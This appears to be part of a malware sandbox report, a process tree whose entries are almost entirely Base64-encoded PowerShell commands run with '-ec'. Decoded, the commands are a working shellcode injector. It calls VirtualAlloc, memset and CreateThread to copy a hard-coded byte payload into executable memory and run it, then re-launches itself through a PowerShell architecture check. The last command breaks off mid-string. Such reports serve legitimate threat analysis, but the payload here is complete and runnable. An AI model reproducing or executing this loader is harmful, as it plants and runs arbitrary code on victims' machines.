AGYALAAwAHgAZQAwACwAMAB4ADIANgAsADAAeAA5AGQALAAwAHgAOAA4ACwAMAB4ADcAZQAsADAAeABkADkALAAwAHgAMQBlACwAMAB4AGUAOQAsADAAeAA1ADcALAAwAHgAMQBkACwAMAB4ADQAYQAsADAAeABiADkALAAwAHgAYwBmACwAMAB4AGIANAAsADAAeABmADMALAAwAHgANQAyACwAMAB4ADEAMAAsADAAeAAzADkALAAwAHgAMgA2ACwAMAB4AGMAZQAsADAAeAAxAGEALAAwAHgAYQBkACwAMAB4ADkAMgAsADAAeABhAGYALAAwAHgAOAA0ACwAMAB4ADEAYwAsADAAeAA0AGQALAAwAHgAYgAyACwAMAB4AGIAYQAsADAAeAA0AGYALAAwAHgAZAAxACwAMAB4ADMAYgAsADAAeAA1AGMALAAwAHgAMwBmACwAMAB4AGIAOQAsADAAeAA2AGIALAAwAHgAZgAxACwAMAB4AGYAZgAsADAAeAA2ADkALAAwAHgAYwBjACwAMAB4AGEAMQAsADAAeAA5ADcALAAwAHgANgAzACwAMAB4AGMAMwAsADAAeAA5AGUALAAwAHgAOAA3ACwAMAB4ADgAYgAsADAAeAAwADkALAAwAHgAYgA3ACwAMAB4ADIAZAAsADAAeAA2ADQALAAwAHgAZQA0ACwAMAB4AGUAZgAsADAAeABkADkALAAwAHgAMQBkACwAMAB4AGEAZAAsADAAeAA2ADQALAAwAHgANwA4ACwAMAB4AGUAMQAsADAAeAA3AGIALAAwAHgAMAAxACwAMAB4AGIAYQAsADAAeAA2ADkALAAwAHgAOAA4ACwAMAB4AGYANQAsADAAeAA3ADQALAAwAHgAOQBhACwAMAB4AGUANQAsADAAeABlADUALAAwAHgAZQAwACwAMAB4ADYAYQAsADAAeABiADAALAAwAHgANQA0ACwAMAB4AGEANgAsADAAeAA3ADUALAAwAHgANgBlACwAMAB4AGYAMgAsADAAeAA0ADYALAAwAHgAZQAwACwAMAB4ADkANQAsADAAeAA1ADUALAAwAHgAMQAxACwAMAB4ADkAYwAsADAAeAA5ADcALAAwAHgAOAAwACwAMAB4ADUANQAsADAAeAAwADMALAAwAHgANgA3ACwAMAB4AGUANwAsADAAeABlAGUALAAwAHgAOABhACwAMAB4AGYAZAAsADAAeAA0ADgALAAwAHgAOQA4ACwAMAB4AGYAMgAsADAAeAAxADEALAAwAHgANAA5ACwAMAB4ADUAOAAsADAAeABhADUALAAwAHgANwBiACwAMAB4ADQAOQAsADAAeAAzADAALAAwAHgAMQAxACwAMAB4AGQAOAAsADAAeAAxAGEALAAwAHgAMgA1ACwAMAB4ADUAZQAsADAAeABmADUALAAwAHgAMABlACwAMAB4AGYANgAsADAAeABjAGIALAAwAHgAZgA2ACwAMAB4ADYANgAsADAAeABhAGIALAAwAHgANQBjACwAMAB4ADkAZgAsADAAeAA4ADQALAAwAHgAOQAyACwAMAB4AGEAYgAsADAAeAAwADAALAAwAHgANwA2ACwAMAB4AGYAMQAsADAAeAAyAGQALAAwAHgANwBjACwAMAB4AGEAMQAsADAAeAAzAGYALAAwAHgANQA4ACwAMAB4ADYAYwAsADAAeAA3ADEAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAGUAVABiAGMAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGUAVABiAGMALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAGUAVABiAGMALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABUAFQATQApACkAOwAkAHcAeAB2ACAAPQAgACIALQBlAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAGQARABTACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAGQARABTACAAJAB3AHgAdgAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJAB3AHgAdgAgACQAZQAiADsAfQA='"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABUAFQATQAgAD0AIAAnACQAdwBEAFgAeQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJAB3AEQAWAB5ACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYQAsADAAeABjADEALAAwAHgAYgBhACwAMAB4ADQAZQAsADAAeABlADMALAAwAHgAZQA2ACwAMAB4ADgAOQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBlACwAMAB4ADIAYgAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQANwAsADAAeAA4ADMALAAwAHgAZQBlACwAMAB4AGYAYwAsADAAeAAzADEALAAwAHgANQA2ACwAMAB4ADEANAAsADAAeAAwADMALAAwAHgANQA2ACwAMAB4ADUAYQAsADAAeAAwADEALAAwAHgAMQAzACwAMAB4ADcANQAsADAAeAA4AGEALAAwAHgANAA3ACwAMAB4AGQAYwAsADAAeAA4ADYALAAwAHgANABhACwAMAB4ADIAOAAsADAAeAA1ADQALAAwAHgANgAzACwAMAB4ADcAYgAsADAAeAA2ADgALAAwAHgAMAAyACwAMAB4AGUANwAsADAAeAAyAGIALAAwAHgANQA4ACwAMAB4ADQAMAAsADAAeABhADUALAAwAHgAYwA3ACwAMAB4ADEAMwAsADAAeAAwADQALAAwAHgANQBlACwAMAB4ADUAYwAsADAAeAA1ADEALAAwAHgAOAAxACwAMAB4ADUAMQAsADAAeABkADUALAAwAHgAZABjACwAMAB4AGYANwAsADAAeAA1AGMALAAwAHgAZQA2ACwAMAB4ADQAZAAsADAAeABjAGIALAAwAHgAZgBmACwAMAB4ADYANAAsADAAeAA4AGMALAAwAHgAMQA4ACwAMAB4ADIAMAAsADAAeAA1ADUALAAwAHgANQBmACwAMAB4ADYAZAAsADAAeAAyADEALAAwAHgAOQAyACwAMAB4ADgAMgAsADAAeAA5AGMALAAwAHgANwAzACwAMAB4ADQAYgAsADAAeABjADgALAAwAHgAMwAzACwAMAB4ADYANAAsADAAeABmADgALAAwAHgAOAA0ACwAMAB4ADgAZgAsADAAeAAwAGYALAAwAHgAYgAyACwAMAB4ADAAOQAsADAAeAA4ADgALAAwAHgAZQBjACwAMAB4ADAAMgAsADAAeAAyAGIALAAwAHgAYgA5ACwAMAB4AGEAMgAsADAAeAAxADkALAAwAHgANwAyACwAMAB4ADEAOQAsADAAeAA0ADQALAAwAHgAYwBlACwAMAB4ADAAZQAsADAAeAAxADAALAAwAHgANQBlACwAMAB4ADEAMwAsADAAeAAyAGEALAAwAHgAZQBhACwAMAB4AGQANQAsADAAeABlADcALAAwAHgAYwAwACwAMAB4AGUAZAAsADAAeAAzAGYALAAwAHgAMwA2ACwAMAB4ADIAOAAsADAAeAA0ADEALAAwAHgANwBlACwAMAB4AGYANwAsADAAeABkAGIALAAwAHgAOQBiACwAMAB4ADQANgAsADAAeAAzAGYALAAwAHgAMAA0ACwAMAB4AGUAZQAsADAAeABiAGUALAAwAHgAMwBjACwAMAB4AGIAOQAsADAAeABlADkALAAwAHgAMAA0ACwAMAB4ADMAZgAsADAAeAA2ADUALAAwAHgANwBmACwAMAB4ADkAZgAsADAAeABlADcALAAwAHgAZQBlACwAMAB4ADIANwAsADAAeAA3AGIALAAwAHgAMQA2ACwAMAB4ADIAMgAsADAAeABiADEALAAwAHgAMAA4ACwAMAB4ADEANAAsADAAeAA4AGYALAAwAHgAYgA1ACwAMAB4ADUANwAsADAAeAAzADgALAAwAHgAMABlACwAMAB4ADEAOQAsADAAeABlAGMALAAwAHgANAA0ACwAMAB4ADkAYgAsADAAeAA5AGMALAAwAHgAMgAzACwAMAB4AGMAZAAsADAAeABkAGYALAAwAHgAYgBhACwAMAB4AGUANwAsADAAeAA5ADYALAAwAHgAOAA0ACwAMAB4AGEAMwAsADAAeABiAGUALAAwAHgANwAyACwAMAB4ADYAYQAsADAAeABkAGIALAAwAHgAYQAxACwAMAB4AGQAZAAsADAAeABkADMALAAwAHgANwA5ACwAMAB4AGEAOQAsADAAeABmADMALAAwAHgAMAAwACwAMAB4AGYAMAAsADAAeABmADAALAAwAHgAOQBiACwAMAB4AGUANQAsADAAeAAzADkALAAwAHgAMABiACwAMAB4ADUAYgAsADAAeAA2ADIALAAwAHgANAA5ACwAMAB4ADcAOAAsADAAeAA2ADkALAAwAHgAMgBkACwAMAB4AGUAMQAsADAAeAAxADYALAAwAHgAYwAxACwAMAB4AGEANgAsADAAeAAyAGYALAAwAHgAZQAwACwAMAB4ADIANgAsADAAeAA5AGQALAAwAHgAOAA4ACwAMAB4ADcAZQAsADAAeABkADkALAAwAHgAMQBlACwAMAB4AGUAOQAsADAAeAA1ADcALAAwAHgAMQBkACwAMAB4ADQAYQAsADAAeABiADkALAAwAHgAYwBmACwAMAB4AGIANAAsADAAeABmADMALAAwAHgANQAyACwAMAB4ADEAMAAsADAAeAAzADkALAAwAHgAMgA2ACwAMAB4AGMAZQAsADAAeAAxAGEALAAwAHgAYQBkACwAMAB4ADkAMgAsADAAeABhAGYALAAwAHgAOAA0ACwAMAB4ADEAYwAsADAAeAA0AGQALAAwAHgAYgAyACwAMAB4AGIAYQAsADAAeAA0AGYALAAwAHgAZAAxACwAMAB4ADMAYgAsADAAeAA1AGMALAAwAHgAMwBmACwAMAB4AGIAOQAsADAAeAA2AGIALAAwAHgAZgAxACwAMAB4AGYAZgAsADAAeAA2ADkALAAwAHgAYwBjACwAMAB4AGEAMQAsADAAeAA5ADcALAAwAHgANgAzACwAMAB4AGMAMwAsADAAeAA5AGUALAAwAHgAOAA3ACwAMAB4ADgAYgAsADAAeAAwADkALAAwAHgAYgA3ACwAMAB4ADIAZAAsADAAeAA2ADQALAAwAHgAZQA0ACwAMAB4AGUAZgAsADAAeABkADkALAAwAHgAMQBkACwAMAB4AGEAZAAsADAAeAA2ADQALAAwAHgANwA4ACwAMAB4AGUAMQAsADAAeAA3AGIALAAwAHgAMAAxACwAMAB4AGIAYQAsADAAeAA2ADkALAAwAHgAOAA4ACwAMAB4AGYANQAsADAAeAA3ADQALAAwAHgAOQBhACwAMAB4AGUANQAsADAAeABlADUALAAwAHgAZQAwACwAMAB4ADYAYQAsADAAeABiADAALAAwAHgANQA0ACwAMAB4AGEANgAsADAAeAA3ADUALAAwAHgANgBlACwAMAB4AGYAMgAsADAAeAA0ADYALAAwAHgAZQAwACwAMAB4ADkANQAsADAAeAA1ADUALAAwAHgAMQAxACwAMAB4ADkAYwAsADAAeAA5ADcALAAwAHgAOAAwACwAMAB4ADUANQAsADAAeAAwADMALAAwAHgANgA3ACwAMAB4AGUANwAsADAAeABlAGUALAAwAHgAOABhACwAMAB4AGYAZAAsADAAeAA0ADgALAAwAHgAOQA4ACwAMAB4AGYAMgAsADAAeAAxADEALAAwAHgANAA5ACwAMAB4ADUAOAAsADAAeABhADUALAAwAHgANwBiACwAMAB4ADQAOQAsADAAeAAzADAALAAwAHgAMQAxACwAMAB4AGQAOAAsADAAeAAxAGEALAAwAHgAMgA1ACwAMAB4ADUAZQAsADAAeABmADUALAAwAHgAMABlACwAMAB4AGYANgAsADAAeABjAGIALAAwAHgAZgA2ACwAMAB4ADYANgAsADAAeABhAGIALAAwAHgANQBjACwAMAB4ADkAZgAsADAAeAA4ADQALAAwAHgAOQAyACwAMAB4AGEAYgAsADAAeAAwADAALAAwAHgANwA2ACwAMAB4AGYAMQAsADAAeAAyAGQALAAwAHgANwBjACwAMAB4AGEAMQAsADAAeAAzAGYALAAwAHgANQA4ACwAMAB4ADYAYwAsADAAeAA3ADEAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAGUAVABiAGMAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGUAVABiAGMALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAGUAVABiAGMALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABUAFQATQApACkAOwAkAHcAeAB2ACAAPQAgACIALQBlAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAGQARABTACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAGQARABTACAAJAB3AHgAdgAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJAB3AHgAdgAgACQAZQAiADsAfQA=
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:828

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JAB3AEQAWAB5ACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAdwBEAFgAeQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkAGEALAAwAHgAYwAxACwAMAB4AGIAYQAsADAAeAA0AGUALAAwAHgAZQAzACwAMAB4AGUANgAsADAAeAA4ADkALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAZQAsADAAeAAyAGIALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0ADcALAAwAHgAOAAzACwAMAB4AGUAZQAsADAAeABmAGMALAAwAHgAMwAxACwAMAB4ADUANgAsADAAeAAxADQALAAwAHgAMAAzACwAMAB4ADUANgAsADAAeAA1AGEALAAwAHgAMAAxACwAMAB4ADEAMwAsADAAeAA3ADUALAAwAHgAOABhACwAMAB4ADQANwAsADAAeABkAGMALAAwAHgAOAA2ACwAMAB4ADQAYQAsADAAeAAyADgALAAwAHgANQA0ACwAMAB4ADYAMwAsADAAeAA3AGIALAAwAHgANgA4ACwAMAB4ADAAMgAsADAAeABlADcALAAwAHgAMgBiACwAMAB4ADUAOAAsADAAeAA0ADAALAAwAHgAYQA1ACwAMAB4AGMANwAsADAAeAAxADMALAAwAHgAMAA0ACwAMAB4ADUAZQAsADAAeAA1AGMALAAwAHgANQAxACwAMAB4ADgAMQAsADAAeAA1ADEALAAwAHgAZAA1ACwAMAB4AGQAYwAsADAAeABmADcALAAwAHgANQBjACwAMAB4AGUANgAsADAAeAA0AGQALAAwAHgAYwBiACwAMAB4AGYAZgAsADAAeAA2ADQALAAwAHgAOABjACwAMAB4ADEAOAAsADAAeAAyADAALAAwAHgANQA1ACwAMAB4ADUAZgAsADAAeAA2AGQALAAwAHgAMgAxACwAMAB4ADkAMgAsADAAeAA4ADIALAAwAHgAOQBjACwAMAB4ADcAMwAsADAAeAA0AGIALAAwAHgAYwA4ACwAMAB4ADMAMwAsADAAeAA2ADQALAAwAHgAZgA4ACwAMAB4ADgANAAsADAAeAA4AGYALAAwAHgAMABmACwAMAB4AGIAMgAsADAAeAAwADkALAAwAHgAOAA4ACwAMAB4AGUAYwAsADAAeAAwADIALAAwAHgAMgBiACwAMAB4AGIAOQAsADAAeABhADIALAAwAHgAMQA5ACwAMAB4ADcAMgAsADAAeAAxADkALAAwAHgANAA0ACwAMAB4AGMAZQAsADAAeAAwAGUALAAwAHgAMQAwACwAMAB4ADUAZQAsADAAeAAxADMALAAwAHgAMgBhACwAMAB4AGUAYQAsADAAeABkADUALAAwAHgAZQA3ACwAMAB4AGMAMAAsADAAeABlAGQALAAwAHgAMwBmACwAMAB4ADMANgAsADAAeAAyADgALAAwAHgANAAxACwAMAB4ADcAZQAsADAAeABmADcALAAwAHgAZABiACwAMAB4ADkAYgAsADAAeAA0ADYALAAwAHgAMwBmACwAMAB4ADAANAAsADAAeABlAGUALAAwAHgAYgBlACwAMAB4ADMAYwAsADAAeABiADkALAAwAHgAZQA5ACwAMAB4ADAANAAsADAAeAAzAGYALAAwAHgANgA1ACwAMAB4ADcAZgAsADAAeAA5AGYALAAwAHgAZQA3ACwAMAB4AGUAZQAsADAAeAAyADcALAAwAHgANwBiACwAMAB4ADEANgAsADAAeAAyADIALAAwAHgAYgAxACwAMAB4ADAAOAAsADAAeAAxADQALAAwAHgAOABmACwAMAB4AGIANQAsADAAeAA1ADcALAAwAHgAMwA4ACwAMAB4ADAAZQAsADAAeAAxADkALAAwAHgAZQBjACwAMAB4ADQANAAsADAAeAA5AGIALAAwAHgAOQBjACwAMAB4ADIAMwAsADAAeABjAGQALAAwAHgAZABmACwAMAB4AGIAYQAsADAAeABlADcALAAwAHgAOQA2ACwAMAB4ADgANAAsADAAeABhADMALAAwAHgAYgBlACwAMAB4ADcAMgAsADAAeAA2AGEALAAwAHgAZABiACwAMAB4AGEAMQAsADAAeABkAGQALAAwAHgAZAAzACwAMAB4ADcAOQAsADAAeABhADkALAAwAHgAZgAzACwAMAB4ADAAMAAsADAAeABmADAALAAwAHgAZgAwACwAMAB4ADkAYgAsADAAeABlADUALAAwAHgAMwA5ACwAMAB4ADAAYgAsADAAeAA1AGIALAAwAHgANgAyACwAMAB4ADQAOQAsADAAeAA3ADgALAAwAHgANgA5ACwAMAB4ADIAZAAsADAAeABlADEALAAwAHgAMQA2ACwAMAB4AGMAMQAsADAAeABhADYALAAwAHgAMgBmACwAMAB4AGUAMAAsADAAeAAyADYALAAwAHgAOQBkACwAMAB4ADgAOAAsADAAeAA3AGUALAAwAHgAZAA5ACwAMAB4ADEAZQAsADAAeABlADkALAAwAHgANQA3ACwAMAB4ADEAZAAsADAAeAA0AGEALAAwAHgAYgA5ACwAMAB4AGMAZgAsADAAeABiADQALAAwAHgAZgAzACwAMAB4ADUAMgAsADAAeAAxADAALAAwAHgAMwA5ACwAMAB4ADIANgAsADAAeABjAGUALAAwAHgAMQBhACwAMAB4AGEAZAAsADAAeAA5ADIALAAwAHgAYQBmACwAMAB4ADgANAAsADAAeAAxAGMALAAwAHgANABkACwAMAB4AGIAMgAsADAAeABiAGEALAAwAHgANABmACwAMAB4AGQAMQAsADAAeAAzAGIALAAwAHgANQBjACwAMAB4ADMAZgAsADAAeABiADkALAAwAHgANgBiACwAMAB4AGYAMQAsADAAeABmAGYALAAwAHgANgA5ACwAMAB4AGMAYwAsADAAeABhADEALAAwAHgAOQA3ACwAMAB4ADYAMwAsADAAeABjADMALAAwAHgAOQBlACwAMAB4ADgANwAsADAAeAA4AGIALAAwAHgAMAA5ACwAMAB4AGIANwAsADAAeAAyAGQALAAwAHgANgA0ACwAMAB4AGUANAAsADAAeABlAGYALAAwAHgAZAA5ACwAMAB4ADEAZAAsADAAeABhAGQALAAwAHgANgA0ACwAMAB4ADcAOAAsADAAeABlADEALAAwAHgANwBiACwAMAB4ADAAMQAsADAAeABiAGEALAAwAHgANgA5ACwAMAB4ADgAOAAsADAAeABmADUALAAwAHgANwA0ACwAMAB4ADkAYQAsADAAeABlADUALAAwAHgAZQA1ACwAMAB4AGUAMAAsADAAeAA2AGEALAAwAHgAYgAwACwAMAB4ADUANAAsADAAeABhADYALAAwAHgANwA1ACwAMAB4ADYAZQAsADAAeABmADIALAAwAHgANAA2ACwAMAB4AGUAMAAsADAAeAA5ADUALAAwAHgANQA1ACwAMAB4ADEAMQAsADAAeAA5AGMALAAwAHgAOQA3ACwAMAB4ADgAMAAsADAAeAA1ADUALAAwAHgAMAAzACwAMAB4ADYANwAsADAAeABlADcALAAwAHgAZQBlACwAMAB4ADgAYQAsADAAeABmAGQALAAwAHgANAA4ACwAMAB4ADkAOAAsADAAeABmADIALAAwAHgAMQAxACwAMAB4ADQAOQAsADAAeAA1ADgALAAwAHgAYQA1ACwAMAB4ADcAYgAsADAAeAA0ADkALAAwAHgAMwAwACwAMAB4ADEAMQAsADAAeABkADgALAAwAHgAMQBhACwAMAB4ADIANQAsADAAeAA1AGUALAAwAHgAZgA1ACwAMAB4ADAAZQAsADAAeABmADYALAAwAHgAYwBiACwAMAB4AGYANgAsADAAeAA2ADYALAAwAHgAYQBiACwAMAB4ADUAYwAsADAAeAA5AGYALAAwAHgAOAA0ACwAMAB4ADkAMgAsADAAeABhAGIALAAwAHgAMAAwACwAMAB4ADcANgAsADAAeABmADEALAAwAHgAMgBkACwAMAB4ADcAYwAsADAAeABhADEALAAwAHgAMwBmACwAMAB4ADUAOAAsADAAeAA2AGMALAAwAHgANwAxADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABlAFQAYgBjAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABlAFQAYgBjAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABlAFQAYgBjACwA